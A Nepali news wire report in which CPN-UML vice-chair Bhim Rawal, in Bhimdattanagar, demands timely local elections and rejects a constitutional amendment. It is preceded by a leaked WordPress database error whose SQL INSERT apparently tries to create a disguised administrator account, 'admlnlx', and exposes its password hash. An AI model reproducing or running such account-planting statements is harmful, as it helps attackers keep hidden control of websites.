WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BLQMYHhpYkrP1CcG5qunkfr.gEnpMj0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-31 22:30:22', '', 'admlnlx', 'admlnlx')
भीमदत्तनगर, माघ १५ –
पूर्व उपप्रधानमन्त्री तथा नेकपा (एमाले) का उपाध्यक्ष भीम रावलले स्थानीय निकायको निर्वाचन गर्न ढिलाइ गर्न नहुनेमा जोड दिनुभएको छ ।
कञ्चनपुरको भीमदत्तनगरमा शनिबार नेपाल उद्योग तथा व्यवसायी महासङ्घको प्रदेश नं ७ स्तरीय भेलाको उद्घाटन गर्दै उपाध्यक्ष रावलले तोकिएको समयमा स्थानीय तहको निर्वाचन हुन नसके मुलुकको राजनीति अप्ठ्यारोमा पर्ने बताउनुभयो ।
“दिगो शान्ति, राजनीतिक स्थायित्व, जनताको हकअधिकारका लागि पनि निर्वाचन गर्नुपर्छ ।” रावलले भन्नुभयो – “नेकपा ९एमाले० तत्काल निर्वाचन गराउन माग गर्दछ ।” वर्तमान सरकारले राष्ट्रिय हितविपरीत क्रियाकलाप गरिरहेको आरोप लगाउँदै उहाँले स्वाभिमानलाई कमजोर हुन नदिन प्रतिपक्षी दल एमालेले व्यवस्थापिका–संसद् अवरुद्ध गर्नुपर्ने बताउनुभयो ।
“संविधान स्वाभिमान बचाउन ल्याइएको हो ।” रावलले भन्नुभयो –“स्वाभिमान कमजोर पार्न र एकताबद्ध भएको तराई, पहाड–हिमाललाई टुक्र्याउन होइन ।” संविधान संशोधन जनताको इच्छा, आकाङ्क्षा नभएको दाबी गर्दै उहाँले राजनीतिक स्थिरता हुन नदिने षड्यन्त्र भइरहेको धारणा राख्नुभयो । संविधान संशोधन गरेर कुनै समस्या समाधान नहुने उहाँको भनाइ थियो । – रासस